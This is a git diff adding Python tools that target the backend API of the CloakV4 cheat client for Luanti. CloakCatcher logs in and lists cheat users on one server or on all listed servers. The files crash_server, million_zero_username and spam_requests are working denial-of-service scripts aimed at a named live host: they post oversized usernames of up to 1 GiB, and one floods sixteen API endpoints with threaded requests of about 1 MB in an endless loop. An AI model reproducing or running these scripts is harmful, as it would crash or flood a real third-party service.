diff --git a/cloakcatcher/CHANGELOG.md b/cloakcatcher/CHANGELOG.md new file mode 100755 index 0000000..afd3cd9 Binary files /dev/null and b/cloakcatcher/CHANGELOG.md differ diff --git a/cloakcatcher/Makefile b/cloakcatcher/Makefile new file mode 100755 index 0000000..7ae6aa9 --- /dev/null +++ b/cloakcatcher/Makefile @@ -0,0 +1,17 @@ +all_linux: + + sudo apt install python3 python3-requests python3-pip -y + pip3 install pyinstaller --break-system-packages + python3 -m PyInstaller -F -n"CloakCatcher" main.py + mkdir -p bin/ + mv -f dist/CloakCatcher bin/ + cp -f cloakcatcher.conf bin/ + +clean: + + rm -rf dist/ build/ __pycache__/ CloakCatcher.spec + +reset: + + rm -rf bin/ + echo "" > cloakcatcher.conf diff --git a/cloakcatcher/README.md b/cloakcatcher/README.md new file mode 100755 index 0000000..d3cc1c8 --- /dev/null +++ b/cloakcatcher/README.md @@ -0,0 +1,51 @@ +# CloakCatcher +## version 1.4.1 +CloakCatcher is a small program written in Python 3 to identify users of the **CloakV4 cheat client**: +[Website](https://cloak-v4.web.app/) +[GitHub](https://github.com/TeamAcedia/CloakV4/) + +**Do not share this script with anyone.** If a CloakV4 developer gets their hands on this script, it's useless. (lol nvm) +## Usage: +### Windows: +Install [Python 3](https://python.org/downloads/windows/) +**Make sure to select the option to install pip** +Then open Command Prompt and run: +`pip3 install requests` + +To run the script, open the folder that contains the script in Command Prompt and run: +`python cloakcatcher.py` + +To compile it to a Windows Executable (.exe): +Open Command Prompt in the folder CloakCatcher is in, and run: +`pip3 install pyinstaller` +followed by: +`python -m PyInstaller -Fn"CloakCatcher" cloakcatcher.py` +The executable is located in `dist\`. You can copy this file anywhere you like and remove the remaining files. + +### Linux (Debian and Ubuntu, maybe Mint): +Install **Python 3**: +Run `sudo apt install python3` in Terminal +Run `sudo apt install python3-requests` in Terminal +or +`pip3 install requests --break-system-packages` in Terminal + +To run the script: +Open Terminal in the folder CloakCatcher is in, and run: +`python3 cloakcatcher.py` + +To compile it to an executable file: +Run `make`. +The executable is located in `bin/`. You can copy this file anywhere you like and remove the remaining files. +To remove files created during build time that are not needed: +Run `make clean` +To restore CloakCatcher's source code to the original state: +Run `make clean && make reset` +This will remove build files and executables, and clear the configuration file. +### MacOS/iOS/Android: +go get a real pc and chuck your current device out the window +## Config file: +The config file (`bin/cloakcatcher.conf`) stores configuration for CloakCatcher. +Here is the proper syntax of it: +{"cloakv4_username": "", "cloakv4_password": "", "server_ip": "", "server_port": "", "serverlist_url": ""} +serverlist_url should be set to "http://servers.luanti.org/list" unless you are targeting a specific list, **don't edit this unless you know what you are doing.** +**If you are using a compiled version, edit `bin/cloakcatcher.conf` (created at buildtime). If you are directly running the script without compiling, edit `cloakcatcher.conf`** diff --git a/cloakcatcher/cloakcatcher.conf b/cloakcatcher/cloakcatcher.conf new file mode 100755 index 0000000..8b13789 --- /dev/null +++ b/cloakcatcher/cloakcatcher.conf @@ -0,0 +1 @@ + diff --git a/cloakcatcher/extract_config.py b/cloakcatcher/extract_config.py new file mode 100755 index 0000000..10969ea --- /dev/null +++ b/cloakcatcher/extract_config.py @@ -0,0 +1,35 @@ +# extract_config.py +# Made by user333_ +# Meant to be included with main.py + +from ast import literal_eval +from sys import exit + +CONFIG_FILE = "cloakcatcher.conf" + +def extract_config() -> dict: + + try: + + with open(CONFIG_FILE, "r") as f: + + config_data = f.read().strip() + + config = literal_eval(config_data) + restructured_config = { + "username": config["cloakv4_username"], + "passwd": config["cloakv4_password"], + "address": config["server_ip"], + "port": config["server_port"], + "serverlist_url": config["serverlist_url"]} + return restructured_config + + except Exception as e: + + print(f"[WARNING] {CONFIG_FILE} is empty, missing, or incorrectly structured.") + return {} + +if __name__ == "__main__": + + raise Exception("[ERROR] You ran the wrong script, run main.py instead.") + exit(1) diff --git a/cloakcatcher/fetch_data.py b/cloakcatcher/fetch_data.py new file mode 100755 index 0000000..64e4370 --- /dev/null +++ b/cloakcatcher/fetch_data.py @@ -0,0 +1,42 @@ +# fetch_data.py +# Made by user333_ +# Meant to be included with main.py + +from requests import post, get +from sys import exit + +def fetch_data(url: str, json: dict, request_type: str) -> dict: + + if request_type == "post": + + try: + + data = post(url = url, json = json) + return data.json() + + except Exception as e: + + NetworkError(e) + + if request_type == "get": + + try: + + data = get(url = url) + return data.json() + + except Exception as e: + + NetworkError(e) + +def NetworkError(e: str): + + raise Exception(f"""[ERROR] Error 1: An exception occured while attempting to fetch data. +This could be a result of an invalid request, no network connection, or the server is offline. +Exception: {e}""") + exit(1) + +if __name__ == "__main__": + + raise Exception("[ERROR] You ran the wrong script, run main.py instead.") + exit(1) diff --git a/cloakcatcher/handle_input.py b/cloakcatcher/handle_input.py new file mode 100755 index 0000000..2b7a80e --- /dev/null +++ b/cloakcatcher/handle_input.py @@ -0,0 +1,87 @@ +# handle_input.py +# Made by user333_ +# Meant to be included with main.py + +from extract_config import extract_config +from sys import exit + +def handle_input() -> dict: + + try: + + print("Welcome to CloakCatcher v1.4.1") + + prompt = None + + while prompt not in ["", "1", "2"]: + + print("Select a function:\n") + print("1. Scan an individual server for CloakV4 users (default)") + print("2. Scan all servers for CloakV4 users") + + prompt = input("\nSelect (1-2): ").strip() + + config = extract_config() + + if prompt == "1" or prompt == "": + + if config != {}: + + username: str = input("CloakV4 username (press enter for default): " ).strip() or config["username"] + passwd: str = input("CloakV4 password (press enter for default): " ).strip() or config["passwd"] + address: str = input("IP of server to scan (press enter for default): " ).strip() or config["address"] + port: str = input("Port of server to scan (press enter for default): ").strip() or config["port"] + + else: + + username: str = input("CloakV4 username: " ).strip() + passwd: str = input("CloakV4 password: " ).strip() + address: str = input("IP of server to scan: " ).strip() + port: str = input("Port of server to scan: ").strip() + + new_config = { + "username": username, + "passwd": passwd, + "address": address, + "port": port, + "serverlist_url": "" + } + + return new_config + + if prompt == "2": + + if config != {}: + + username: str = input("CloakV4 username (press enter for default): ").strip() or config["username"] + passwd: str = input("CloakV4 password (press enter for default): ").strip() or config["passwd"] + servlist: str = input("Serverlist URL (press enter for default): " ).strip() or config["serverlist_url"] + + else: + + username: str = input("CloakV4 username: ").strip() + passwd: str = input("CloakV4 password: ").strip() + servlist: str = input("Serverlist URL (press enter for default serverlist): ").strip() or "http://servers.luanti.org/list" + + new_config = { + "username": username, + "passwd": passwd, + "address": "all", + "port": "all", + "serverlist_url": servlist + } + + return new_config + + else: + + print ("Invalid response.") + + except Exception: + + raise Exception("[ERROR] Invalid configuration.") + exit(1) + +if __name__ == "__main__": + + raise Exception("[ERROR] You ran the wrong script, run main.py instead.") diff --git a/cloakcatcher/hash_data.py b/cloakcatcher/hash_data.py new file mode 100755 index 0000000..abca085 --- /dev/null +++ b/cloakcatcher/hash_data.py @@ -0,0 +1,26 @@ +# hash_data.py +# Made by user333_ +# Meant to be included with main.py + +from hashlib import sha256 +from sys import exit + +def hash_data(data: str) -> str: + + try: + + data = data.encode() + h = sha256() + h.update(data) + hashed_data = h.hexdigest() + return hashed_data + + except Exception: + + raise Exception(f"[ERROR] Failed to hash binary data '{data}'") + exit(1) + +if __name__ == "__main__": + + raise Exception("[ERROR] You ran the wrong script, run main.py instead.") + exit(1) diff --git a/cloakcatcher/main.py b/cloakcatcher/main.py new file mode 100755 index 0000000..df3182a --- /dev/null +++ b/cloakcatcher/main.py @@ -0,0 +1,133 @@ +# CloakCatcher v1.4.1 +# Made by user333_ + +print(r""" + ___ _ _ ___ _ _ + / __\ | ___ __ _| | __ / __\__ _| |_ ___| |__ ___ _ __ + / / | |/ _ \ / _` | |/ // / / _` | __/ __| '_ \ / _ \ '__| +/ /___| | (_) | (_| | None: + + CloakCatcher.main() + +class CloakCatcher: + + def main() -> None: + + try: + + if ADDRESS == "all" and PORT == "all": # Full serverlist scan mode. + + CloakCatcher.full_serverlist() + + else: # Single-server scan mode. + + CloakCatcher.single_server() + + except KeyboardInterrupt: + + print("Exiting...") + exit(0) + + def single_server() -> None: + + while True: + + hashed_passwd = hash_data(PASSWD) + session_token = fetch_data(url + login_url, { + "username": USERNAME, + "password": hashed_passwd + }, + "post")["session_token"] + players_on_cv4 = fetch_data(url + players_url, { + "token": session_token, + "server_address": ADDRESS, + "server_port": PORT + }, + "post")["players"] + + if len(players_on_cv4) > 0: + + print("\nPlayers detected on CloakV4:\n") + + for n in range(0, len(players_on_cv4)): + + print(f"Playername: \"{players_on_cv4[n]['joined_name']}\", CloakV4 username: \"{players_on_cv4[n]['username']}\"") + + else: + + print("No players detected on CloakV4.") + + input("\nPress Enter to refresh.\nPress [Ctrl + C] to exit.\n") + print(f"{'*'*80}\n") # Nicer-looking in code than typing 80 asteriks, but slightly less readable + + def full_serverlist() -> None: + + while True: + + servers = fetch_data(SERVLIST, {}, "get")["list"] + + count = 0 + skipped = 0 + + for server in servers: + + if server["clients"] > 0: + + count += 1 + hashed_passwd = hash_data(PASSWD) + session_token = fetch_data(url + login_url, { + "username": USERNAME, + "password": hashed_passwd + }, + "post")["session_token"] + + players_on_cv4 = fetch_data(url + players_url, { + "token": session_token, + "server_address": server["address"], + "server_port": str(server["port"]) + }, + "post")["players"] + + stdout.write("\r[" + "|/-\\"[count % 4] + f"] Scanned {count}/{len(servers)} servers. Skipped {skipped} servers.") # Why does python care if i have a backslash in an f-string... + + if len(players_on_cv4) > 0: + + for n in range(0, len(players_on_cv4)): + + print("\n\nPlayers detected on CloakV4:") + print(f"Server: \"{server['name']}\" ({server['address']}:{server['port']})") + print(f"Playername: \"{players_on_cv4[n]['joined_name']}\", CloakV4 username: \"{players_on_cv4[n]['username']}\"\n") + + else: + + skipped += 1 + stdout.write("\r[" + "|/-\\"[count % 4] + f"] Scanned {count}/{len(servers)} servers. Skipped {skipped} servers.") # See line #63, comment. + + input("\n\nPress Enter to refresh.\nPress [Ctrl + C] to exit.\n") + print(f"{'*'*80}\n") + +if __name__ == "__main__": + + main() diff --git a/crash_server/main.py b/crash_server/main.py new file mode 100755 index 0000000..6243050 --- /dev/null +++ b/crash_server/main.py @@ -0,0 +1,25 @@ +#!/bin/python3 + +import requests +import hashlib + +PASSWORD = '0' +USERNAME = '0'*1024*1024*1024 + +API_URL = "https://teamacedia.baselinux.net:22222/" +ENDPOINT_REGISTER = "/api/register" + +def main() -> int: + response = requests.post( + url = API_URL + ENDPOINT_REGISTER, + json = { + "username": USERNAME, + "password": PASSWORD + } + ) + + print(response.status_code) + return 0 if response.status_code == 200 else 1 + +if __name__ == '__main__': + exit(main()) diff --git a/million_zero_username/main.py b/million_zero_username/main.py new file mode 100755 index 0000000..a0ac14a --- /dev/null +++ b/million_zero_username/main.py @@ -0,0 +1,32 @@ +#!/bin/python3 + +import requests +import hashlib + +PASSWORD = '0' +USERNAME = '0'*1024*1024 + +API_URL = "https://teamacedia.baselinux.net:22222/" +ENDPOINT_REGISTER = "/api/register" + +def hash_pw(pw: str) -> str: + h = hashlib.sha256() + h.update(pw.encode()) + return h.hexdigest() + +def main() -> int: + pw = hash_pw(PASSWORD) + + response = requests.post( + url = API_URL + ENDPOINT_REGISTER, + json = { + "username": USERNAME, + "password": pw + } + ) + + print(response.status_code) + return 0 if response.status_code == 200 else 1 + +if __name__ == '__main__': + exit(main()) diff --git a/spam_requests/main.py b/spam_requests/main.py new file mode 100755 index 0000000..23393d3 --- /dev/null +++ b/spam_requests/main.py @@ -0,0 +1,41 @@ +import requests, time, _thread + +API_URL = "http://teamacedia.baselinux.net:22222" + +ENDPOINTS = [ + "/api/register", + "/api/login", + "/api/verify-session", + "/api/server/join", + "/api/server/leave", + "/api/server/players", + "/api/cosmetics/capes", + "/api/users/capes", + "/api/users/capes/set_selected", + "/api/users/capes/get_selected", + "/api/users/get_all", + "/api/rewards/create", + "/api/rewards/update", + "/api/rewards/delete", + "/api/rewards/get_all", + "/api/rewards/redeem" +] + +def spam_endpoint(endpoint: str) -> None: + response = requests.post( + url = API_URL + endpoint, + json = { + "0": "0"*1024*1023 + } + ) + + print(f"{endpoint} returned status code {response.status_code}") + +def main() -> None: + while True: + for endpoint in ENDPOINTS: + time.sleep(0.005) + _thread.start_new_thread(spam_endpoint, (endpoint,)) + +if __name__ == "__main__": + main()